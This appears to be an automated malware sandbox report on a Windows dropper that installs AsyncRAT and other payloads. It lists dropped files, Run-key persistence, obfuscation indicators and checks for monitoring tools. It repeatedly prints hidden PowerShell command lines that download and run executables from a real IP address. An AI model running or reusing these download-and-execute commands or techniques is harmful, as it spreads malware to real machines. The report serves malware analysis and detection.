Source: C:\Windows\System32\mshta.exe	Process created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -WindowStyle Hidden $d=$env:temp+'MHLZAGA5NZFMG2ZDILNZW0CTFV5YR4HM.EXE';(New-Object System.Net.WebClient).DownloadFile('http://185.215.113.16/defend/random.exe',$d);Start-Process $d;
Source: C:\Windows\SysWOW64\mshta.exe	Process created: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -WindowStyle Hidden $d=$env:temp+'\483d2fa8a0d53818306efeb32d3.exe';(New-Object System.Net.WebClient).DownloadFile('http://185.215.113.16/mine/random.exe',$d);Start-Process $d;
Source: C:\Windows\System32\mshta.exe	Process created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -WindowStyle Hidden $d=$env:temp+'\483d2fa8a0d53818306efeb32d3.exe';(New-Object System.Net.WebClient).DownloadFile('http://185.215.113.16/mine/random.exe',$d);Start-Process $d;
Source: C:\Windows\SysWOW64\mshta.exe	Process created: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -WindowStyle Hidden $d=$env:temp+'OBIIERT8JWKOKQBWJVVZGBZ2TJW54YEP.EXE';(New-Object System.Net.WebClient).DownloadFile('http://185.215.113.16/defend/random.exe',$d);Start-Process $d;
Source: C:\Windows\System32\mshta.exe	Process created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -WindowStyle Hidden $d=$env:temp+'OBIIERT8JWKOKQBWJVVZGBZ2TJW54YEP.EXE';(New-Object System.Net.WebClient).DownloadFile('http://185.215.113.16/defend/random.exe',$d);Start-Process $d;
Source: C:\Windows\SysWOW64\mshta.exe	Process created: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -WindowStyle Hidden $d=$env:temp+'MHLZAGA5NZFMG2ZDILNZW0CTFV5YR4HM.EXE';(New-Object System.Net.WebClient).DownloadFile('http://185.215.113.16/defend/random.exe',$d);Start-Process $d;	Jump to behavior
Source: C:\Windows\System32\mshta.exe	Process created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -WindowStyle Hidden $d=$env:temp+'MHLZAGA5NZFMG2ZDILNZW0CTFV5YR4HM.EXE';(New-Object System.Net.WebClient).DownloadFile('http://185.215.113.16/defend/random.exe',$d);Start-Process $d;
Source: C:\Windows\SysWOW64\mshta.exe	Process created: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -WindowStyle Hidden $d=$env:temp+'\483d2fa8a0d53818306efeb32d3.exe';(New-Object System.Net.WebClient).DownloadFile('http://185.215.113.16/mine/random.exe',$d);Start-Process $d;
Source: C:\Windows\System32\mshta.exe	Process created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -WindowStyle Hidden $d=$env:temp+'\483d2fa8a0d53818306efeb32d3.exe';(New-Object System.Net.WebClient).DownloadFile('http://185.215.113.16/mine/random.exe',$d);Start-Process $d;
Source: C:\Windows\SysWOW64\mshta.exe	Process created: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -WindowStyle Hidden $d=$env:temp+'OBIIERT8JWKOKQBWJVVZGBZ2TJW54YEP.EXE';(New-Object System.Net.WebClient).DownloadFile('http://185.215.113.16/defend/random.exe',$d);Start-Process $d;
Source: C:\Windows\System32\mshta.exe	Process created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -WindowStyle Hidden $d=$env:temp+'OBIIERT8JWKOKQBWJVVZGBZ2TJW54YEP.EXE';(New-Object System.Net.WebClient).DownloadFile('http://185.215.113.16/defend/random.exe',$d);Start-Process $d;

Yara detected Costura Assembly Loader

Source: Yara match	File source: 7.2.k6Sly2p.exe.56e0000.14.raw.unpack, type: UNPACKEDPE
Source: Yara match	File source: 7.2.k6Sly2p.exe.56e0000.14.unpack, type: UNPACKEDPE
Source: Yara match	File source: 00000007.00000002.2828666224.00000000056E0000.00000004.08000000.00040000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 00000007.00000002.2464434325.0000000002911000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 00000042.00000002.2801612037.00000000032B1000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: Process Memory Space: k6Sly2p.exe PID: 5796, type: MEMORYSTR

Binary contains a suspicious time stamp

Source: random[2].exe.6.dr

Static PE information: 0xDA43F2C8 [Mon Jan 14 22:35:52 2086 UTC]

Contains functionality to dynamically determine API calls

Source: C:\Users\user\AppData\Local\Temp\1075489001\afccf6841f.exe

Code function: 8_2_00F142DE GetVersionExW,GetCurrentProcess,IsWow64Process,LoadLibraryA,GetProcAddress,GetNativeSystemInfo,FreeLibrary,GetSystemInfo,GetSystemInfo,

8_2_00F142DE

Entry point lies outside standard sections

Source: initial sample

Static PE information: section where entry point is pointing to: .taggant

PE file contains an invalid checksum

Source: 9228e21255.exe.6.dr	Static PE information: real checksum: 0x0 should be: 0x557df
Source: k6Sly2p.exe.6.dr	Static PE information: real checksum: 0x0 should be: 0x2511a4
Source: random[1].exe.6.dr	Static PE information: real checksum: 0x0 should be: 0xbb8c2
Source: random[2].exe0.6.dr	Static PE information: real checksum: 0x0 should be: 0x557df
Source: 5d2afc26b8.exe.6.dr	Static PE information: real checksum: 0x0 should be: 0xbb8c2
Source: random[1].exe1.6.dr	Static PE information: real checksum: 0xdfde2 should be: 0xd54e7
Source: k6Sly2p[1].exe.6.dr	Static PE information: real checksum: 0x0 should be: 0x2511a4
Source: random[2].exe1.6.dr	Static PE information: real checksum: 0x21288c should be: 0x210b0e
Source: dc785309cb.exe.6.dr	Static PE information: real checksum: 0xdfde2 should be: 0xd54e7
Source: skotes.exe.0.dr	Static PE information: real checksum: 0x20fa2e should be: 0x219cd6
Source: DhqvS8pXj8.exe	Static PE information: real checksum: 0x20fa2e should be: 0x219cd6
Source: d895046020.exe.6.dr	Static PE information: real checksum: 0x21288c should be: 0x210b0e
Source: k6Sly2p.exe0.6.dr	Static PE information: real checksum: 0x0 should be: 0x2511a4
Source: random[2].exe.6.dr	Static PE information: real checksum: 0x0 should be: 0x74670
Source: 1e8dfbd5c2.exe.6.dr	Static PE information: real checksum: 0x0 should be: 0x74670

PE file contains sections with non-standard names

Source: DhqvS8pXj8.exe	Static PE information: section name:
Source: DhqvS8pXj8.exe	Static PE information: section name: .idata
Source: DhqvS8pXj8.exe	Static PE information: section name:
Source: DhqvS8pXj8.exe	Static PE information: section name: fsnlaalu
Source: DhqvS8pXj8.exe	Static PE information: section name: pycumdux
Source: DhqvS8pXj8.exe	Static PE information: section name: .taggant
Source: skotes.exe.0.dr	Static PE information: section name:
Source: skotes.exe.0.dr	Static PE information: section name: .idata
Source: skotes.exe.0.dr	Static PE information: section name:
Source: skotes.exe.0.dr	Static PE information: section name: fsnlaalu
Source: skotes.exe.0.dr	Static PE information: section name: pycumdux
Source: skotes.exe.0.dr	Static PE information: section name: .taggant
Source: random[2].exe1.6.dr	Static PE information: section name:
Source: random[2].exe1.6.dr	Static PE information: section name: .idata
Source: random[2].exe1.6.dr	Static PE information: section name:
Source: random[2].exe1.6.dr	Static PE information: section name: voasjcay
Source: random[2].exe1.6.dr	Static PE information: section name: mgtkptwk
Source: random[2].exe1.6.dr	Static PE information: section name: .taggant
Source: d895046020.exe.6.dr	Static PE information: section name:
Source: d895046020.exe.6.dr	Static PE information: section name: .idata
Source: d895046020.exe.6.dr	Static PE information: section name:
Source: d895046020.exe.6.dr	Static PE information: section name: voasjcay
Source: d895046020.exe.6.dr	Static PE information: section name: mgtkptwk
Source: d895046020.exe.6.dr	Static PE information: section name: .taggant
Source: random[1].exe2.6.dr	Static PE information: section name: .symtab

Uses code obfuscation techniques (call, push, ret)

Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe	Code function: 6_2_008FD91C push ecx; ret	6_2_008FD92F
Source: C:\Users\user\AppData\Local\Temp\1075350001\k6Sly2p.exe	Code function: 7_2_027B2272 push esi; ret	7_2_027B227C
Source: C:\Users\user\AppData\Local\Temp\1075350001\k6Sly2p.exe	Code function: 7_2_027B2256 push ebp; ret	7_2_027B2257
Source: C:\Users\user\AppData\Local\Temp\1075350001\k6Sly2p.exe	Code function: 7_2_027B23EC push eax; ret	7_2_027B23ED
Source: C:\Users\user\AppData\Local\Temp\1075350001\k6Sly2p.exe	Code function: 7_2_027B2450 push ebp; ret	7_2_027B255E
Source: C:\Users\user\AppData\Local\Temp\1075350001\k6Sly2p.exe	Code function: 7_2_027B2550 push ebp; ret	7_2_027B255E
Source: C:\Users\user\AppData\Local\Temp\1075350001\k6Sly2p.exe	Code function: 7_2_027B4545 push ebp; ret	7_2_027B46AE
Source: C:\Users\user\AppData\Local\Temp\1075350001\k6Sly2p.exe	Code function: 7_2_027B45D0 push ebp; ret	7_2_027B46AE
Source: C:\Users\user\AppData\Local\Temp\1075350001\k6Sly2p.exe	Code function: 7_2_027B08F8 push esp; ret	7_2_027B0906
Source: C:\Users\user\AppData\Local\Temp\1075350001\k6Sly2p.exe	Code function: 7_2_027B098F push ebx; ret	7_2_027B099E
Source: C:\Users\user\AppData\Local\Temp\1075350001\k6Sly2p.exe	Code function: 7_2_027B3740 push ebx; ret	7_2_027B374E
Source: C:\Users\user\AppData\Local\Temp\1075350001\k6Sly2p.exe	Code function: 7_2_027B3543 push esi; ret	7_2_027B3546
Source: C:\Users\user\AppData\Local\Temp\1075350001\k6Sly2p.exe	Code function: 7_2_027B1A78 push ebp; ret	7_2_027B1A82
Source: C:\Users\user\AppData\Local\Temp\1075350001\k6Sly2p.exe	Code function: 7_2_027B3AFF push eax; ret	7_2_027B3B01
Source: C:\Users\user\AppData\Local\Temp\1075350001\k6Sly2p.exe	Code function: 7_2_027B3B78 push eax; ret	7_2_027B3B86
Source: C:\Users\user\AppData\Local\Temp\1075350001\k6Sly2p.exe	Code function: 7_2_027B3B4B push ecx; ret	7_2_027B3B4C
Source: C:\Users\user\AppData\Local\Temp\1075350001\k6Sly2p.exe	Code function: 7_2_027B3B88 push eax; ret	7_2_027B3C16
Source: C:\Users\user\AppData\Local\Temp\1075350001\k6Sly2p.exe	Code function: 7_2_027B397B push ebx; ret	7_2_027B397E
Source: C:\Users\user\AppData\Local\Temp\1075350001\k6Sly2p.exe	Code function: 7_2_027B3D79 push esp; ret	7_2_027B3D86
Source: C:\Users\user\AppData\Local\Temp\1075350001\k6Sly2p.exe	Code function: 7_2_0493754F push ss; iretd	7_2_04937557
Source: C:\Users\user\AppData\Local\Temp\1075350001\k6Sly2p.exe	Code function: 7_2_049330F4 push ds; iretd	7_2_049330FD
Source: C:\Users\user\AppData\Local\Temp\1075350001\k6Sly2p.exe	Code function: 7_2_049349E6 pushad ; ret	7_2_049349E7
Source: C:\Users\user\AppData\Local\Temp\1075350001\k6Sly2p.exe	Code function: 7_2_060831B0 push ebp; iretd	7_2_060831B5
Source: C:\Users\user\AppData\Local\Temp\1075350001\k6Sly2p.exe	Code function: 7_2_06083DB7 push edx; ret	7_2_06083DB8
Source: C:\Users\user\AppData\Local\Temp\1075489001\afccf6841f.exe	Code function: 8_2_00F30A76 push ecx; ret	8_2_00F30A89
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Code function: 13_2_04D03435 pushad ; iretd	13_2_04D03439
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Code function: 13_2_04D031AA pushfd ; ret	13_2_04D031B9
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Code function: 13_2_04D033AB pushad ; iretd	13_2_04D03439

Source: DhqvS8pXj8.exe	Static PE information: section name: entropy: 7.084846373081339
Source: DhqvS8pXj8.exe	Static PE information: section name: fsnlaalu entropy: 7.953941964036779
Source: skotes.exe.0.dr	Static PE information: section name: entropy: 7.084846373081339
Source: skotes.exe.0.dr	Static PE information: section name: fsnlaalu entropy: 7.953941964036779
Source: random[2].exe1.6.dr	Static PE information: section name: entropy: 7.940912998585798
Source: random[2].exe1.6.dr	Static PE information: section name: voasjcay entropy: 7.952788344032962
Source: d895046020.exe.6.dr	Static PE information: section name: entropy: 7.940912998585798
Source: d895046020.exe.6.dr	Static PE information: section name: voasjcay entropy: 7.952788344032962

Source: random[2].exe.6.dr, gBMthepoZSL1ZVKpeA.cs	High entropy of concatenated method names: 'iJ7hGcJiZtrY1vmTXS1', 'l3eRiSJQRS1T675dhDw', 'reTlcDMFua', 'BxhRGVJ7kheGMf3Py2t', 'gg3ZFVJakBdVFuZCIgG', 'G5c3kgJhorWWcabQiWI', 'Gim47mJIx9UyjsEXoD7', 'ItKq8kJ0OyIS0T9lLUQ', 'N6HgC6J6Gp0JEvuuieG', 'g4UifPJHxIeKxNQ4Axj'
Source: 1e8dfbd5c2.exe.6.dr, gBMthepoZSL1ZVKpeA.cs	High entropy of concatenated method names: 'iJ7hGcJiZtrY1vmTXS1', 'l3eRiSJQRS1T675dhDw', 'reTlcDMFua', 'BxhRGVJ7kheGMf3Py2t', 'gg3ZFVJakBdVFuZCIgG', 'G5c3kgJhorWWcabQiWI', 'Gim47mJIx9UyjsEXoD7', 'ItKq8kJ0OyIS0T9lLUQ', 'N6HgC6J6Gp0JEvuuieG', 'g4UifPJHxIeKxNQ4Axj'
Source: random[1].exe.6.dr, PjMboxrZKVMRiayL4T.cs	High entropy of concatenated method names: 't2mTkbE8Cto8HmGlYV8', 'g4u1IrEawEsUZ67S7Wi', 'amqdtVWeNm', 'pA5ZBQEtT6loGltfEMA', 'GXxHyNEjrGXyH8tEQAB', 'eVsKxBEvbdJjNe0EZye', 'pqnThvEuBxnf8vqytJr', 'UUsUd7EA9gx3jM1UCGb', 's4C7e6ETm1C8hnG34B0', 'bmgy4SEkrKbXNPCdYnP'
Source: random[1].exe.6.dr, IAYNcYxlTFn1TcgV7Nc.cs	High entropy of concatenated method names: 'pxCx1VClxM', 'EqUxbGvDUa', 'YtEx6PpsFY', 'rlHxMgdHsd', 'OTtxe6u7RZ', 'E9gxQ9PVdu', 'u49x0BEP7D', 'kHbxFT0Aes', 'sv1xVTxidI', 'eeWxoNxt0u'
Source: 5d2afc26b8.exe.6.dr, PjMboxrZKVMRiayL4T.cs	High entropy of concatenated method names: 't2mTkbE8Cto8HmGlYV8', 'g4u1IrEawEsUZ67S7Wi', 'amqdtVWeNm', 'pA5ZBQEtT6loGltfEMA', 'GXxHyNEjrGXyH8tEQAB', 'eVsKxBEvbdJjNe0EZye', 'pqnThvEuBxnf8vqytJr', 'UUsUd7EA9gx3jM1UCGb', 's4C7e6ETm1C8hnG34B0', 'bmgy4SEkrKbXNPCdYnP'
Source: 5d2afc26b8.exe.6.dr, IAYNcYxlTFn1TcgV7Nc.cs	High entropy of concatenated method names: 'pxCx1VClxM', 'EqUxbGvDUa', 'YtEx6PpsFY', 'rlHxMgdHsd', 'OTtxe6u7RZ', 'E9gxQ9PVdu', 'u49x0BEP7D', 'kHbxFT0Aes', 'sv1xVTxidI', 'eeWxoNxt0u'

Persistence and Installation Behavior

Drops PE files with a suspicious file extension

Source: C:\Users\user\AppData\Local\Temp\764661\Macromedia.com	File created: C:\Users\user\AppData\Local\GuardTech Solutions\AchillesGuard.com			Jump to dropped file
Source: C:\Windows\SysWOW64\cmd.exe	File created: C:\Users\user\AppData\Local\Temp\764661\Macromedia.com			Jump to dropped file

Tries to download and execute files (via powershell)

Source: C:\Windows\SysWOW64\mshta.exe	Process created: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -WindowStyle Hidden $d=$env:temp+'MHLZAGA5NZFMG2ZDILNZW0CTFV5YR4HM.EXE';(New-Object System.Net.WebClient).DownloadFile('http://185.215.113.16/defend/random.exe',$d);Start-Process $d;
Source: C:\Windows\System32\mshta.exe	Process created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -WindowStyle Hidden $d=$env:temp+'MHLZAGA5NZFMG2ZDILNZW0CTFV5YR4HM.EXE';(New-Object System.Net.WebClient).DownloadFile('http://185.215.113.16/defend/random.exe',$d);Start-Process $d;
Source: C:\Windows\SysWOW64\mshta.exe	Process created: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -WindowStyle Hidden $d=$env:temp+'\483d2fa8a0d53818306efeb32d3.exe';(New-Object System.Net.WebClient).DownloadFile('http://185.215.113.16/mine/random.exe',$d);Start-Process $d;
Source: C:\Windows\System32\mshta.exe	Process created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -WindowStyle Hidden $d=$env:temp+'\483d2fa8a0d53818306efeb32d3.exe';(New-Object System.Net.WebClient).DownloadFile('http://185.215.113.16/mine/random.exe',$d);Start-Process $d;
Source: C:\Windows\SysWOW64\mshta.exe	Process created: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -WindowStyle Hidden $d=$env:temp+'OBIIERT8JWKOKQBWJVVZGBZ2TJW54YEP.EXE';(New-Object System.Net.WebClient).DownloadFile('http://185.215.113.16/defend/random.exe',$d);Start-Process $d;
Source: C:\Windows\System32\mshta.exe	Process created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -WindowStyle Hidden $d=$env:temp+'OBIIERT8JWKOKQBWJVVZGBZ2TJW54YEP.EXE';(New-Object System.Net.WebClient).DownloadFile('http://185.215.113.16/defend/random.exe',$d);Start-Process $d;
Source: C:\Windows\SysWOW64\mshta.exe	Process created: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -WindowStyle Hidden $d=$env:temp+'MHLZAGA5NZFMG2ZDILNZW0CTFV5YR4HM.EXE';(New-Object System.Net.WebClient).DownloadFile('http://185.215.113.16/defend/random.exe',$d);Start-Process $d;	Jump to behavior
Source: C:\Windows\System32\mshta.exe	Process created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -WindowStyle Hidden $d=$env:temp+'MHLZAGA5NZFMG2ZDILNZW0CTFV5YR4HM.EXE';(New-Object System.Net.WebClient).DownloadFile('http://185.215.113.16/defend/random.exe',$d);Start-Process $d;
Source: C:\Windows\SysWOW64\mshta.exe	Process created: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -WindowStyle Hidden $d=$env:temp+'\483d2fa8a0d53818306efeb32d3.exe';(New-Object System.Net.WebClient).DownloadFile('http://185.215.113.16/mine/random.exe',$d);Start-Process $d;
Source: C:\Windows\System32\mshta.exe	Process created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -WindowStyle Hidden $d=$env:temp+'\483d2fa8a0d53818306efeb32d3.exe';(New-Object System.Net.WebClient).DownloadFile('http://185.215.113.16/mine/random.exe',$d);Start-Process $d;
Source: C:\Windows\SysWOW64\mshta.exe	Process created: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -WindowStyle Hidden $d=$env:temp+'OBIIERT8JWKOKQBWJVVZGBZ2TJW54YEP.EXE';(New-Object System.Net.WebClient).DownloadFile('http://185.215.113.16/defend/random.exe',$d);Start-Process $d;
Source: C:\Windows\System32\mshta.exe	Process created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -WindowStyle Hidden $d=$env:temp+'OBIIERT8JWKOKQBWJVVZGBZ2TJW54YEP.EXE';(New-Object System.Net.WebClient).DownloadFile('http://185.215.113.16/defend/random.exe',$d);Start-Process $d;

Drops PE files

Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe	File created: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\ZVZFKMB9\L5shRfh[1].exe	Jump to dropped file
Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe	File created: C:\Users\user\AppData\Local\Temp\1075509001\dc785309cb.exe	Jump to dropped file
Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe	File created: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\ZVZFKMB9\random[2].exe	Jump to dropped file
Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe	File created: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\3D003UC5\random[2].exe	Jump to dropped file
Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe	File created: C:\Users\user\AppData\Local\Temp\1075515001\k6Sly2p.exe	Jump to dropped file
Source: C:\Users\user\AppData\Local\Temp\1075350001\k6Sly2p.exe	File created: C:\ProgramData\jhbbvnx\fbpbh.exe	Jump to dropped file
Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe	File created: C:\Users\user\AppData\Local\Temp\1075516001\L5shRfh.exe	Jump to dropped file
Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe	File created: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\ZVZFKMB9\random[1].exe	Jump to dropped file
Source: C:\Windows\SysWOW64\cmd.exe	File created: C:\Users\user\AppData\Local\Temp\764661\Macromedia.com	Jump to dropped file
Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe	File created: C:\Users\user\AppData\Local\Temp\1075519001\Fe36XBk.exe	Jump to dropped file
Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe	File created: C:\Users\user\AppData\Local\Temp\1075510001\c1336f9f75.exe	Jump to dropped file
Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe	File created: C:\Users\user\AppData\Local\Temp\1075514001\d895046020.exe	Jump to dropped file
Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe	File created: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\YLNGKWRH\7fOMOTQ[1].exe	Jump to dropped file
Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe	File created: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\3D003UC5\random[1].exe	Jump to dropped file
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	File created: C:\Users\user\AppData\Local\Temp\483d2fa8a0d53818306efeb32d3.exe	Jump to dropped file
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	File created: C:\Users\user\AppData\Local\TempMHLZAGA5NZFMG2ZDILNZW0CTFV5YR4HM.EXE	Jump to dropped file
Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe	File created: C:\Users\user\AppData\Local\Temp\1075489001\afccf6841f.exe	Jump to dropped file
Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe	File created: C:\Users\user\AppData\Local\Temp\1075511001\1e8dfbd5c2.exe	Jump to dropped file
Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe	File created: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\ZJCZETOO\random[1].exe	Jump to dropped file
Source: C:\Users\user\AppData\Local\Temp\764661\Macromedia.com	File created: C:\Users\user\AppData\Local\GuardTech Solutions\AchillesGuard.com	Jump to dropped file
Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe	File created: C:\Users\user\AppData\Local\Temp\1075513001\9228e21255.exe	Jump to dropped file
Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe	File created: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\3D003UC5\k6Sly2p[1].exe	Jump to dropped file
Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe	File created: C:\Users\user\AppData\Local\Temp\1075512001\5d2afc26b8.exe	Jump to dropped file
Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe	File created: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\3D003UC5\Fe36XBk[1].exe	Jump to dropped file
Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe	File created: C:\Users\user\AppData\Local\Temp\1075517001\7fOMOTQ.exe	Jump to dropped file
Source: C:\Users\user\Desktop\DhqvS8pXj8.exe	File created: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe	Jump to dropped file
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	File created: C:\Users\user\AppData\Local\TempOBIIERT8JWKOKQBWJVVZGBZ2TJW54YEP.EXE	Jump to dropped file
Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe	File created: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\ZJCZETOO\random[2].exe	Jump to dropped file
Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe	File created: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\YLNGKWRH\random[1].exe	Jump to dropped file
Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe	File created: C:\Users\user\AppData\Local\Temp\1075350001\k6Sly2p.exe	Jump to dropped file

Drops PE files to the application program directory (C:\ProgramData)

Source: C:\Users\user\AppData\Local\Temp\1075350001\k6Sly2p.exe

File created: C:\ProgramData\jhbbvnx\fbpbh.exe

Jump to dropped file

Boot Survival

Yara detected AsyncRAT

Source: Yara match	File source: 57.2.Macromedia.com.40c24a8.2.raw.unpack, type: UNPACKEDPE
Source: Yara match	File source: 57.2.Macromedia.com.40c24a8.2.unpack, type: UNPACKEDPE
Source: Yara match	File source: 57.2.Macromedia.com.198a050.1.raw.unpack, type: UNPACKEDPE
Source: Yara match	File source: 57.2.Macromedia.com.198a050.1.unpack, type: UNPACKEDPE
Source: Yara match	File source: 00000039.00000002.2988583690.000000000197A000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 00000039.00000002.2989177292.00000000040B0000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 00000039.00000002.2989177292.00000000040C2000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY

Creates multiple autostart registry keys

Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe	Registry value created or modified: HKEY_CURRENT_USER\SOFTWARE\Microsoft\Windows\CurrentVersion\Run afccf6841f.exe			Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe	Registry value created or modified: HKEY_CURRENT_USER\SOFTWARE\Microsoft\Windows\CurrentVersion\Run am_no.cmd			Jump to behavior

Tries to detect process monitoring tools (Task Manager, Process Explorer etc.)

Source: C:\Users\user\Desktop\DhqvS8pXj8.exe	Window searched: window name: FilemonClass	Jump to behavior
Source: C:\Users\user\Desktop\DhqvS8pXj8.exe	Window searched: window name: PROCMON_WINDOW_CLASS	Jump to behavior
Source: C:\Users\user\Desktop\DhqvS8pXj8.exe	Window searched: window name: RegmonClass	Jump to behavior
Source: C:\Users\user\Desktop\DhqvS8pXj8.exe	Window searched: window name: FilemonClass	Jump to behavior
Source: C:\Users\user\Desktop\DhqvS8pXj8.exe	Window searched: window name: PROCMON_WINDOW_CLASS	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe	Window searched: window name: FilemonClass	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe	Window searched: window name: PROCMON_WINDOW_CLASS	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe	Window searched: window name: RegmonClass	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe	Window searched: window name: FilemonClass	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe	Window searched: window name: PROCMON_WINDOW_CLASS	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe	Window searched: window name: FilemonClass	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe	Window searched: window name: PROCMON_WINDOW_CLASS	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe	Window searched: window name: RegmonClass	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe	Window searched: window name: FilemonClass	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe	Window searched: window name: PROCMON_WINDOW_CLASS	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe	Window searched: window name: FilemonClass	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe	Window searched: window name: PROCMON_WINDOW_CLASS	Jump to behavior
